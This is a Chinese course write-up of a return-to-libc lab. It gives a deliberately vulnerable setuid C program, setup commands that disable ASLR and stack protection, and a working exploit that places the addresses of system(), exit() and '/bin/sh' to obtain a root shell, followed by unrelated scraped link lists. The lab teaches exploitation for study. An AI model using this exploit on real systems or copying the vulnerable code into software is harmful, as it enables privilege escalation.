ustc_sec
ustc_sec

软件安全-return-to-libc攻防

Return-to-libc Attack Lab

实验目的:绕过栈保护机制,通过缓冲区溢出,获取ubuntu12的root权限
为了对抗缓冲区溢出漏洞,一般linux操作系统允许管理员设置栈不可执行,
这将直接导致将程序控制权直接跳转到shellcode无法运行,造成攻击失败。

为了对抗不可执行栈,聪明的黑客提出了return-to-libc攻击。攻击者不需要可执行的栈,
甚至不需要shellcode。return-to-libc攻击通过将程序的控制权跳转到系统自己的可执行代码,
例如,在libc库中的system()函数,这些函数已经存在于内存中了。

实验目标:

  • 本次实验将给出一个有缓冲区溢出漏洞的程序,你需要通过return-to-libc攻击,并获取root权限。
  • 你需要掌握堆栈模型,system()、exit()、“/bin/sh”在内存中的地址,掌握gdb调试。

准备工作

你可以在ubuntu12中完成本次实验。为了简化攻击,我们需要关闭一些保护机制。

  • 地址随机化 su sysctl -w kernel.randomize_va_space=0
  • 栈保护机制(canaria)gcc -fno-stack-protector ****.c
  • 栈不可执行 gcc -z execstack ****.c

The Vulnerable Program

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include 
#include 
#include 

int bof(FILE *badfile)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */
    fread(buffer, sizeof(char), 40, badfile);

    return 1;
}

int main(int argc, char **argv)
{
    FILE *badfile;

    badfile = fopen("badfile", "r");
    bof(badfile);

    printf("Returned Properly\n");

    fclose(badfile);
    return 1;
}

为了后续return-to-libc攻击能获取到root权限,而不是仅仅弹出一个普通用户的shell,

我们需要编译并设置有效id为root。

$ su root
Password (enter root password)
# gcc -fno-stack-protector -z noexecstack -o retlib retlib.c
# chmod 4755 retlib
# exit

当badfile文件中内容大小低于缓冲区大小的时候,程序正常。

当文件内容大小超过缓冲区大小的时候,程序异常,发生缓冲区溢出。

Exploting the Vulnerability

#include 
#include 
#include 
int main(int argc, char **argv)
{
  char buf[40];
  FILE *badfile;
  int base = 24;
  badfile = fopen("./badfile", "w");

  /* You need to decide the addresses and 
     the values for X, Y, Z. The order of the following 
     three statements does not imply the order of X, Y, Z.
     Actually, we intentionally scrambled the order. */
  *(long *) &buf[base+8] = 0xb7f7ff18;   //  "/bin/sh"
  *(long *) &buf[base] = 0xb7e5e430;   //  system()
  *(long *) &buf[base+4] = 0xb7e51fb0;   //  exit()

  fwrite(buf, sizeof(buf), 1, badfile);
  fclose(badfile);
}

编译运行:获取root权限

软件安全-return-to-libc攻防_第1张图片
获取root权限

如何获取libc函数地址?

创建一个简单程序:

软件安全-return-to-libc攻防_第2张图片
如何获取libc函数地址?

通过gdb查看libc中函数地址:

软件安全-return-to-libc攻防_第3张图片
通过gdb查看libc中函数地址

如何获取字符串“/bin/sh”在内存中的地址?

  • 方案1:设置一个临时的环境变量MYSHELL=/bin/sh
    获取这个环境变量在内存中的地址
软件安全-return-to-libc攻防_第4张图片
设置一个临时的环境变量MYSHELL=/bin/sh
  • 方案2:用上面获取libc的方式,在libc.so中寻找”/bin/sh”
软件安全-return-to-libc攻防_第5张图片
在libc.so中寻找”/bin/sh”

如何理解函数调用?

AT&T汇编
ebp寄存器:堆栈栈底
esp寄存器:堆栈栈顶
eax寄存器:保持函数返回的数据

call foo的含义:
pushl %eip
movl f,%eip

leave的含义:
movl %ebp,%esp
popl %ebp

ret的含义:
popl %eip

你可能感兴趣的:(软件安全-return-to-libc攻防)

  • 2025年SDK游戏盾终极解析:重新定义手游安全的“隐形护甲” 上海云盾商务经理杨杨 游戏安全
    副标题:从客户端加密到AI反外挂,拆解全链路防护如何重塑游戏攻防天平引言:当传统高防在手游战场“失效”2025年全球手游市场规模突破$2000亿,黑客单次攻击成本却降至$30——某SLG游戏因协议层CC攻击单日流失37%玩家,某开放世界游戏遭低频DDoS瘫痪6小时损失千万。传统高防IP的致命短板暴露无遗:无法识别伪造客户端流量、难防协议篡改、误杀率超15%。而集成于游戏终端的SDK游戏盾,正以“源
  • Wireshark攻防实战
    一、基础环境配置安全捕获环境搭建#创建隔离环境并抓包sudoiplinkseteth0promisconsudotcpdump-ieth0-s0-w/mnt/isolated/evidence.pcap高危协议快速过滤tcp.portin{135,139,445,3389}||udp.portin{53,123,161,500,4500}关键字段标记技巧右键IP→ApplyasColumn设置TT
  • 网站渗透测试完全手册:零基础到进阶,系统学习网络安全攻防
    渗透测试介绍渗透测试就是模拟攻击者入侵系统,对系统进行一步步地渗透,发现系统地脆弱环节和隐藏风险。最后形成测试报告提供给系统所有者。系统所有者可根据该测试报告对系统进行加固,提升系统的安全性,防止真正的攻击者入侵。渗透测试的前提一定是得经过系统所有者的授权!未经过授权的渗透测试,就是违法行为!渗透测试意义信息安全评估的重要方法,有利于掌握系统整体安全强度。模拟黑客攻击和思维,评估计算机潜在风险。发
  • 【攻防世界】 web | fileclude 详细题解WP white-persist 攻防世界WEB前端android原型模式pythonphp
    【攻防世界】web|fileclude详细题解WP打开环境首先代码审计阅读代码,有include()函数并且有GET传参的file1、file2的两个参数,猜测是文件包含伪协议题目文件包含伪协议【攻防世界】web|file_include详细题解WP-CSDN博客在我的一篇博客中有过一些详细的介绍,需要的话可以看看核心突破点在于:file_get_contents($file2)===“hello
  • 技战法-正向隧道和反向隧道防御 YCL大摆子 网络
    一、背景在网络安全攻防演练中,攻击者在成功植入Webshell后,往往会快速构建通信隧道(含正向隧道与反向隧道两种模式)。通过建立的隐蔽隧道,攻击者可突破现有安全防护边界,对目标系统实施深度攻击(如权限提升)及内网横向移动,规避传统监测手段。基于对正向/反向隧道构建特征的分析,结合应用系统架构特性,强化隧道检测与阻断机制,提升攻击利用难度二、正向代理和反向代理设备一、正向隧道设备与机制正向隧道由内
  • 技战法-多角度取证提升反制效果 YCL大摆子 网络安全
    一、技战法概述溯源反制核心目标通过对攻击源的追踪分析,精准定位攻击者身份信息(姓名、电话、邮箱、公司、网络ID、物理位置),构建完整攻击者画像。基于画像数据解析攻击手法特征(如漏洞利用路径、工具链偏好),预判后续攻击趋势并制定针对性防御策略。在攻防演习中强化蓝队取证能力,并为真实攻击事件提供司法取证支持(如协助公安机关固定电子证据链)。溯源反制双重价值防御能力提升:通过溯源案例复盘,暴露内部人员信
  • 真千金才是攻防大神(苏野宋熙)火爆小说_《真千金才是攻防大神》苏野宋熙小说免费在线阅读 热门小说全文看
    书名:真千金才是攻防大神主角:苏野宋熙简介:前世防御系统大赛上,男友的女神提交了和我一样的程序模式。我哥出来给女神作证,说我不要脸,是我抄袭女神。我被所有人网暴,甚至连我亲生父母都不肯相信我,他们说我丢人,还不如去死。最终我如他们所愿得病而死,>>>>>>>请前往文章底部全文完整免费阅读>>>>>>>>>戳我继续阅读<<<<<<<<<<关注微信公众号【魔书朗阅】去回个书名或主配角,即可免费阅读【真
  • 2025年工业控制系统安全实战指南:Modbus协议漏洞攻防全解析(附PLC防御代码与资源包) 全息架构师 安全web安全网络安全
    2025年工业控制系统安全实战指南:Modbus协议漏洞攻防全解析(附PLC防御代码与资源包)摘要:随着工业4.0的深化,Modbus协议的安全漏洞已成为工业控制系统的致命弱点。本文深度剖析2024-2025年十大PLC攻击案例,结合施耐德ModiconPLC高危漏洞(CVE-2021-22779)、西门子S7commPlus协议破解等最新事件,提供全栈式防御方案,并附赠PLC安全加固代码模板与工
  • Windows Installer安全深度剖析 Bruce_xiaowei 总结经验笔记windows安全网络安全运维
    WindowsInstaller安全深度剖析作为Windows生态的核心组件,WindowsInstaller(msiexec.exe)负责管理软件安装、维护和卸载。其高权限特性使其成为攻击者眼中的“黄金靶标”。本文从攻防两端深入解析其工作机制、历史漏洞、攻击手法及防御策略。一、WindowsInstaller基础架构与攻击面核心组件与权限模型MSI包结构:采用数据库格式(.msi文件),包含安装
  • 重装世界第四十章----对抗老二 森断武尊
    雅祁在第一时间飞去阻止,却被老二一巴掌拍飞,得意的老二还向雅祁发出胜利一般的怒吼,卡看来应该是四个核心导致了主意识破碎吧,反正已经成了野兽了。"敢在我的地盘撒野……"说着,倒飞出去的雅祁的身形瞬间变大手持一柄长枪,和一面盾牌,据说这两件武器是玛雅族的上古之人用以神金炼制而成的武器,攻防兼备,威力极强。老二也是瞬间来到了雅祁的面前,雅祁一惊,提盾防御,却被老二迎面一拳打飞,不过好在有了盾牌的阻挡,雅
  • AI人工智能数据安全的攻防策略 AI大模型应用工坊 AgenticAI实战人工智能ai
    AI人工智能数据安全的攻防策略:数字世界的智能守护战1.引入与连接:当智能遇上脆弱开场故事:2023年,一家领先的AI医疗公司遭遇了前所未有的数据breach——黑客不仅窃取了10万患者的敏感医疗记录,更通过逆向工程提取了其诊断AI模型的核心参数。这次攻击造成的损失不仅是数亿美元的赔偿,更是公众对AI医疗信任的崩塌。与你相关:当你使用语音助手记录私人想法,或健康APP分析你的医疗数据时,这些AI系
  • 十大兼职赚钱软件排行,10个真实靠谱赚钱还快的app推荐 古楼
    有没有人想知道十大赚钱最快的兼职app么?小编觉得肯定有人想知道,但是很多人想知道的肯定是“哪个赚钱的app是比较靠谱的,而且赚钱比较快”?不得不感叹,现在的手机发展真的很快。在家赚钱只需要一部手机所以,小编认为,如果人们想在家里用手机赚钱,肯定需要备用多达10个快速可靠的软件,但很多人希望这些软件安全,能够快速真实地提现。目前网上确实有很多不靠谱不安全的赚钱app。以下有几个APP是小编使用过的
  • 【客户案例】医疗设备行业借助Parasoft实现代码零缺陷与合规双赢 慧都小项 软件测试医疗设备代码质量静态代码分析FDA认证左移测试
    在全球新冠疫情最严峻的时刻,呼吸机成为拯救重症患者的关键设备。然而,医疗设备的软件安全容不得半点疏忽——哪怕一行代码出错,都可能危及生命。Inovytec公司研发的VentwaySparrow呼吸机不仅通过了FDA510(k)严苛认证,更实现了“零缺陷”的代码质量。他们是如何做到的?答案在于静态代码分析工具ParasoftC/C++test的精准应用。本文将深入解析Inovytec的成功经验,并分
  • 【爬虫】05 - 爬虫攻防 是小崔啊 #爬虫学习爬虫
    爬虫05-爬虫攻防文章目录爬虫05-爬虫攻防一:随机User-Agent爬虫1:fake-useragent2:高级反反爬策略3:生产环境建议二:代理IP爬虫1:获取代理IP2:高阶攻防3:企业级的代理实战三:动态数据的抓取1:动态页面技术全景2:动态页面逆向工程2.1:XHR请求追踪与解析2.2:websocket实时数据捕获3:无头浏览器控制技术3.1:Playwright详解3.2:反反爬虫
  • 《真千金才是攻防大神》(苏野宋熙)全本免费在线阅读~前世防御系统大赛上,男友的女神提交了和我一样的程序模式我哥出来给女神作证,说我不要脸,是我抄袭女神我被所有人网暴,甚至连我亲生父母都不肯相信我... 全本全集小说
    《真千金才是攻防大神》(苏野宋熙)全本免费在线阅读~前世防御系统大赛上,男友的女神提交了和我一样的程序模式我哥出来给女神作证,说我不要脸,是我抄袭女神我被所有人网暴,甚至连我亲生父母都不肯相信我,他们说我丢人,还不如去死主角配角:苏野宋熙简介:5我冷笑一声,“你不是已经和林嘉欣联手了么,有了林嘉欣这个天才,你还用找我修复系统么?”“宋熙!你是怎么跟你哥说话的!你赶紧给我滚回来!”电话又换成了我爸,
  • Python爬虫【四十五章】爬虫攻防战:异步并发+AI反爬识别的技术解密 程序员_CLUB Python入门到进阶python爬虫人工智能
    目录引言:当爬虫工程师遇上AI反爬官一、异步并发基础设施层1.1混合调度框架设计1.2智能连接池管理二、机器学习反爬识别层2.1特征工程体系2.2轻量级在线推理三、智能决策系统3.1动态策略引擎3.2实时对抗案例四、性能优化实战4.1全链路压测数据4.2典型故障处理案例五、总结:构建智能化的爬虫生态系统Python爬虫相关文章(推荐)引言:当爬虫工程师遇上AI反爬官在大数据采集领域,我们正经历着技
  • 代码签名:保障软件安全与可信的关键防线 Arwen303 代码签名SSL证书ssl网络协议网络
    在当今数字化时代,软件应用广泛渗透于各个领域,其安全性与可信度至关重要。代码签名作为一项核心技术手段,犹如软件世界的“数字身份证”,为软件的合法身份与完整性保驾护航。一、代码签名介绍(一)定义与原理代码签名是一种通过数字证书对软件代码进行数字签名的技术。它利用公钥加密体系,开发者使用私钥对代码进行签名,而用户端则通过对应的公钥来验证签名的有效性。当软件被签署后,任何对代码的篡改都会导致签名验证失败
  • 基于深度学习的和平精英(吃鸡)内置锁头训练 摆烂仙君 深度学习人工智能
    前言本教程以和平精英为例,主要讲解如何构建深度学习模型对游戏中角色进行头部标注,并控制鼠标对其进行锁定射击,同时围绕其游戏防作弊系统进行算法攻防讲解,该方案对于csgo,cf等游戏也同样适用。请注意,该教程仅供娱乐教学,若本教程评论超过100,将会开源相关代码并对实际的代码部署进行进一步分析。一、和平精英伤害机制分析在《刺激战场》(现为《和平精英》)中,击中头部的伤害远高于身体其他部位,这是由游戏
  • 第六十二天 服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP 清歌secure 网络安全全栈学习笔记安全springstruts
    第62天服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP知识点:中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic.JBoos,WebSphere,Jenkins,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flas
  • 红队攻防渗透技术实战流程:框架安全:Laravel&Thinkphp&Struct2&SpringBoot HACKNOE 红队攻防渗透技术研习室安全nginxapache
    红队攻防渗透实战1.框架安全1.1PHP-框架安全-Thinkphp&Laravel1.1.1Laravel是一套简洁、优雅的PHPWeb开发框架(PHPWebFramework)。1.1.1.1CVE-2021-3129RCE1.1.2Thinkphp-3.XRCE-6.XRCE1.1.2.1ThinkPHP综合工具1.1.2.26.XlangRCE1.2J2EE-框架安全-SpringBoot
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 43(题目+回答) 独行soc 2025年护网面试职场和发展linux科技渗透测试安全护网
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)431.自我介绍与职业规划2.Webshell源码级检测方案3.2025年新型Web漏洞TOP54.渗透中的高价值攻击点5.智能Fuzz平台架构设计6.堆栈溢出攻防演进7.插桩技术实战应用8.二进制安全能力矩阵9.C语言内存管理精要10.Pyth
  • 网络安全核心技术解析:权限提升(Privilege Escalation)攻防全景
    引言在网络安全攻防对抗中,权限提升(PrivilegeEscalation)是攻击链条中关键的「破局点」。攻击者通过突破系统权限壁垒,往往能以有限权限为跳板,最终掌控整个系统控制权。本文将从攻击原理、技术路径、实战案例到防御体系,全方位解析这一网络空间的「钥匙窃取」艺术。一、权限提升的本质与分类1.1核心定义权限提升指攻击者通过技术手段,将当前运行进程或用户的权限等级突破系统预设的访问控制机制,获
  • 全球DeepFake攻防挑战赛&DataWhale AI 夏令营——图像赛道 czijin 人工智能deeplearning
    全球DeepFake攻防挑战赛&DataWhaleAI夏令营——图像赛道赛题背景随着人工智能技术的迅猛发展,深度伪造技术(Deepfake)正成为数字世界中的一把双刃剑。这项技术不仅为创意内容的生成提供了新的可能性,同时也对数字安全构成了前所未有的挑战。Deepfake技术可以通过人工智能算法生成高度逼真的图像、视频和音频内容,这些内容看起来与真实的毫无二致。然而,这也意味着虚假信息、欺诈行为和隐
  • 从0到1:SQL注入与XSS攻防实战——数据库安全加固全攻略 小张在编程 sqlxss数据库
    引言2023年某电商平台用户数据泄露事件中,黑客仅用一行username='OR'1'='1的登录输入,就拖走了百万用户信息;另一家社交网站更离谱,用户在评论区输入alert('xss'),竟让千万级用户的浏览器成了“提线木偶”。这些看似简单的攻击,为何能撕开企业安全防线?今天我们就来拆解SQL注入与XSS的“作案手法”,并给出一套可落地的数据库安全加固方案——毕竟,防住这两类攻击,能解决80%的
  • 黑客攻防演练之:红队攻击の常见战术及案例 黑客飓风 web安全安全网络
    HVV和HW最近大家看到的比较多,一般指的攻防演练。“攻防演练”通常是指在网络安全领域中,通过模拟攻击和防御的对抗过程,来检验和提升系统安全性、人员技能水平以及应对突发事件能力的一种实践性活动。什么是红队攻防演练,也常被称为“网络安全攻防演练”或“红蓝对抗演练”,是一种通过模拟网络攻击和防御过程,来评估和提升网络安全防护能力的实践活动。它广泛应用于网络安全领域,以及军事、企业、政府机构等多个行业,
  • Redis面试通关秘籍:从缓存穿透到分布式锁的深度剖析 码海漫游者8 缓存redis面试
    文章目录前言:为什么Redis总是面试必考题?(灵魂拷问)一、Redis持久化:RDB和AOF的相爱相杀1.1RDB快照原理(画重点)1.2AOF日志的生存之道二、缓存三大杀手:穿透/击穿/雪崩(死亡三连问)2.1缓存穿透攻防战2.2缓存击穿应急预案2.3雪崩灾难现场还原三、Redis分布式锁的六大陷阱(血泪教训)3.1经典错误示范3.2正确姿势(Redlock算法)3.3时钟漂移的致命影响四、高
  • 数字沙盘的工作原理和架构
    大家读完觉得有帮助记得关注和点赞!!!**网络安全数字沙盘**是一种融合**攻防推演、态势仿真、决策支持**的交互式平台,通过数字孪生技术构建企业网络全景镜像,实现安全风险的动态预判与响应验证。以下从核心原理到架构的深度解析:---###一、数字沙盘核心工作原理####**三层核心能力**```mermaidgraphLRA[网络空间映射]-->B[攻击路径推演]B-->C[防御效果仿真]C-->
  • 网络安全之注入攻击:原理、危害与防御之道
    网络安全之注入攻击:原理、危害与防御之道引言在OWASPTop10安全风险榜单中,注入攻击常年占据首位。2023年Verizon数据泄露调查报告显示,67%的Web应用漏洞与注入类攻击直接相关。本文从技术视角系统解析注入攻击的核心原理、典型场景及防御体系,揭示这一"网络安全头号杀手"的攻防博弈。一、注入攻击的本质与分类1.1基本定义当应用程序将非可信数据(UntrustedData)作为代码解析时
  • 网络安全之XSS漏洞:原理、危害与防御实践 weixin_47233946 信息安全web安全xss安全
    引言跨站脚本攻击(Cross-SiteScripting,XSS)作为OWASP十大Web应用安全风险中的常客,是开发者必须掌握的核心攻防领域。不同于其他漏洞的直接性,XSS通过浏览器端的代码注入实现攻击传播,具有隐蔽性强、危害多样的特点。本文将深入剖析XSS漏洞的底层逻辑,探讨其实际影响,并提供系统化的防御方案。一、XSS攻击技术原理1.1浏览器执行上下文混淆XSS的根本成因在于开发者未能正确处
  • 攻防对抗的工作原理和架构 hao_wujing 安全
    大家读完觉得有帮助记得关注和点赞!!!**攻防对抗(CyberKillChainDefense)**是网络安全领域的动态博弈过程,攻击方通过**入侵链**突破防御,防御方则构建**纵深的检测响应体系**进行拦截反制。其本质是**攻击成本与防御效能的持续对抗升级**。以下从工作原理到架构的深度解析:---###一、攻防对抗核心工作原理####**攻击链(CyberKillChain)vs防御链(De
  • ztree设置禁用节点 3213213333332132 JavaScriptztreejsonsetDisabledNodeAjax
    ztree设置禁用节点的时候注意,当使用ajax后台请求数据,必须要设置为同步获取数据,否者会获取不到节点对象,导致设置禁用没有效果。 $(function(){ showTree(); setDisabledNode(); });
  • JVM patch by Taobao bookjovi javaHotSpot
    在网上无意中看到淘宝提交的hotspot patch,共四个,有意思,记录一下。   7050685:jsdbproc64.sh has a typo in the package name 7058036:FieldsAllocationStyle=2 does not work in 32-bit VM 7060619:C1 should respect inline and
  • 将session存储到数据库中 dcj3sjt126com sqlPHPsession
    CREATE TABLE sessions ( id CHAR(32) NOT NULL, data TEXT, last_accessed TIMESTAMP NOT NULL, PRIMARY KEY (id) );   <?php /** * Created by PhpStorm. * User: michaeldu * Date
  • Vector 171815164 vector
    public Vector<CartProduct> delCart(Vector<CartProduct> cart, String id) { for (int i = 0; i < cart.size(); i++) { if (cart.get(i).getId().equals(id)) { cart.remove(i);
  • 各连接池配置参数比较 g21121 连接池
            排版真心费劲,大家凑合看下吧,见谅~     Druid DBCP C3P0 Proxool 数据库用户名称 Username Username User   数据库密码 Password Password Password   驱动名
  • [简单]mybatis insert语句添加动态字段 53873039oycg mybatis
          mysql数据库,id自增,配置如下:       <insert id="saveTestTb" useGeneratedKeys="true" keyProperty="id" parameterType=&
  • struts2拦截器配置 云端月影 struts2拦截器
    struts2拦截器interceptor的三种配置方法 方法1. 普通配置法 <struts>     <package name="struts2" extends="struts-default">         &
  • IE中页面不居中,火狐谷歌等正常 aijuans IE中页面不居中
    问题是首页在火狐、谷歌、所有IE中正常显示,列表页的页面在火狐谷歌中正常,在IE6、7、8中都不中,觉得可能那个地方设置的让IE系列都不认识,仔细查看后发现,列表页中没写HTML模板部分没有添加DTD定义,就是<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
  • String,int,Integer,char 几个类型常见转换 antonyup_2006 htmlsql.net
    如何将字串 String 转换成整数 int? int i = Integer.valueOf(my_str).intValue(); int i=Integer.parseInt(str); 如何将字串 String 转换成Integer ? Integer integer=Integer.valueOf(str); 如何将整数 int 转换成字串 String ? 1.
  • PL/SQL的游标类型 百合不是茶 显示游标(静态游标)隐式游标游标的更新和删除%rowtyperef游标(动态游标)
    游标是oracle中的一个结果集,用于存放查询的结果;   PL/SQL中游标的声明; 1,声明游标 2,打开游标(默认是关闭的); 3,提取数据 4,关闭游标     注意的要点:游标必须声明在declare中,使用open打开游标,fetch取游标中的数据,close关闭游标   隐式游标:主要是对DML数据的操作隐
  • JUnit4中@AfterClass @BeforeClass @after @before的区别对比 bijian1013 JUnit4单元测试
    一.基础知识 JUnit4使用Java5中的注解(annotation),以下是JUnit4常用的几个annotation: @Before:初始化方法   对于每一个测试方法都要执行一次(注意与BeforeClass区别,后者是对于所有方法执行一次)@After:释放资源  对于每一个测试方法都要执行一次(注意与AfterClass区别,后者是对于所有方法执行一次
  • 精通Oracle10编程SQL(12)开发包 bijian1013 oracle数据库plsql
    /* *开发包 *包用于逻辑组合相关的PL/SQL类型(例如TABLE类型和RECORD类型)、PL/SQL项(例如游标和游标变量)和PL/SQL子程序(例如过程和函数) */ --包用于逻辑组合相关的PL/SQL类型、项和子程序,它由包规范和包体两部分组成 --建立包规范:包规范实际是包与应用程序之间的接口,它用于定义包的公用组件,包括常量、变量、游标、过程和函数等 --在包规
  • 【EhCache二】ehcache.xml配置详解 bit1129 ehcache.xml
    在ehcache官网上找了多次,终于找到ehcache.xml配置元素和属性的含义说明文档了,这个文档包含在ehcache.xml的注释中! ehcache.xml : http://ehcache.org/ehcache.xml ehcache.xsd : http://ehcache.org/ehcache.xsd ehcache配置文件的根元素是ehcahe   ehcac
  • java.lang.ClassNotFoundException: org.springframework.web.context.ContextLoaderL 白糖_ javaeclipsespringtomcatWeb
    今天学习spring+cxf的时候遇到一个问题:在web.xml中配置了spring的上下文监听器: <listener> <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class> </listener>  随后启动
  • angular.element boyitech AngularJSAngularJS APIangular.element
    angular.element 描述:     包裹着一部分DOM element或者是HTML字符串,把它作为一个jQuery元素来处理。(类似于jQuery的选择器啦)     如果jQuery被引入了,则angular.element就可以看作是jQuery选择器,选择的对象可以使用jQuery的函数;如果jQuery不可用,angular.e
  • java-给定两个已排序序列,找出共同的元素。 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.List; public class CommonItemInTwoSortedArray { /** * 题目:给定两个已排序序列,找出共同的元素。 * 1.定义两个指针分别指向序列的开始。 * 如果指向的两个元素
  • sftp 异常,有遇到的吗?求解 Chen.H javajcraftauthjschjschexception
    com.jcraft.jsch.JSchException: Auth cancel at com.jcraft.jsch.Session.connect(Session.java:460) at com.jcraft.jsch.Session.connect(Session.java:154) at cn.vivame.util.ftp.SftpServerAccess.connec
  • [生物智能与人工智能]神经元中的电化学结构代表什么? comsci 人工智能
         我这里做一个大胆的猜想,生物神经网络中的神经元中包含着一些化学和类似电路的结构,这些结构通常用来扮演类似我们在拓扑分析系统中的节点嵌入方程一样,使得我们的神经网络产生智能判断的能力,而这些嵌入到节点中的方程同时也扮演着"经验"的角色....      我们可以尝试一下...在某些神经
  • 通过LAC和CID获取经纬度信息 dai_lm laccid
    方法1: 用浏览器打开http://www.minigps.net/cellsearch.html,然后输入lac和cid信息(mcc和mnc可以填0),如果数据正确就可以获得相应的经纬度 方法2: 发送HTTP请求到http://www.open-electronics.org/celltrack/cell.php?hex=0&lac=<lac>&cid=&
  • JAVA的困难分析 datamachine java
    前段时间转了一篇SQL的文章(http://datamachine.iteye.com/blog/1971896),文章不复杂,但思想深刻,就顺便思考了一下java的不足,当砖头丢出来,希望引点和田玉。   -----------------------------------------------------------------------------------------
  • 小学5年级英语单词背诵第二课 dcj3sjt126com englishword
    money 钱 paper 纸 speak 讲,说 tell 告诉   remember 记得,想起 knock 敲,击,打 question 问题 number 数字,号码   learn 学会,学习 street 街道 carry 搬运,携带 send 发送,邮寄,发射   must 必须 light 灯,光线,轻的 front
  • linux下面没有tree命令 dcj3sjt126com linux
    centos p安装 yum -y install tree   mac os安装 brew install tree   首先来看tree的用法 tree 中文解释:tree 功能说明:以树状图列出目录的内容。 语  法:tree [-aACdDfFgilnNpqstux][-I <范本样式>][-P <范本样式
  • Map迭代方式,Map迭代,Map循环 蕃薯耀 Map循环Map迭代Map迭代方式
    Map迭代方式,Map迭代,Map循环   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年
  • Spring Cache注解+Redis hanqunfeng spring
    Spring3.1 Cache注解  依赖jar包: <!-- redis --> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redis</artifactId>
  • Guava中针对集合的 filter和过滤功能 jackyrong filter
    在guava库中,自带了过滤器(filter)的功能,可以用来对collection 进行过滤,先看例子:    @Test public void whenFilterWithIterables_thenFiltered() { List<String> names = Lists.newArrayList("John"
  • 学习编程那点事 lampcy 编程androidPHPhtml5
    一年前的夏天,我还在纠结要不要改行,要不要去学php?能学到真本事吗?改行能成功吗?太多的问题,我终于不顾一切,下定决心,辞去了工作,来到传说中的帝都。老师给的乘车方式还算有效,很顺利的就到了学校,赶巧了,正好学校搬到了新校区。先安顿了下来,过了个轻松的周末,第一次到帝都,逛逛吧! 接下来的周一,是我噩梦的开始,学习内容对我这个零基础的人来说,除了勉强完成老师布置的作业外,我已经没有时间和精力去
  • 架构师之流处理---------bytebuffer的mark,limit和flip nannan408 ByteBuffer
    1.前言。   如题,limit其实就是可以读取的字节长度的意思,flip是清空的意思,mark是标记的意思 。 2.例子. 例子代码: String str = "helloWorld"; ByteBuffer buff = ByteBuffer.wrap(str.getBytes()); Sy
  • org.apache.el.parser.ParseException: Encountered " ":" ": "" at line 1, column 1 Everyday都不同 $转义el表达式
    最近在做Highcharts的过程中,在写js时,出现了以下异常:   严重: Servlet.service() for servlet jsp threw exception org.apache.el.parser.ParseException: Encountered " ":" ": "" at line 1,
  • 用Java实现发送邮件到163 tntxia java实现
    /* 在java版经常看到有人问如何用javamail发送邮件?如何接收邮件?如何访问多个文件夹等。问题零散,而历史的回复早已经淹没在问题的海洋之中。 本人之前所做过一个java项目,其中包含有WebMail功能,当初为用java实现而对javamail摸索了一段时间,总算有点收获。看到论坛中的经常有此方面的问题,因此把我的一些经验帖出来,希望对大家有些帮助。 此篇仅介绍用
  • 探索实体类存在的真正意义 java小叶檀 POJO
    一. 实体类简述    实体类其实就是俗称的POJO,这种类一般不实现特殊框架下的接口,在程序中仅作为数据容器用来持久化存储数据用的 POJO(Plain Old Java Objects)简单的Java对象   它的一般格式就是 public class A{ private String id; public Str
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他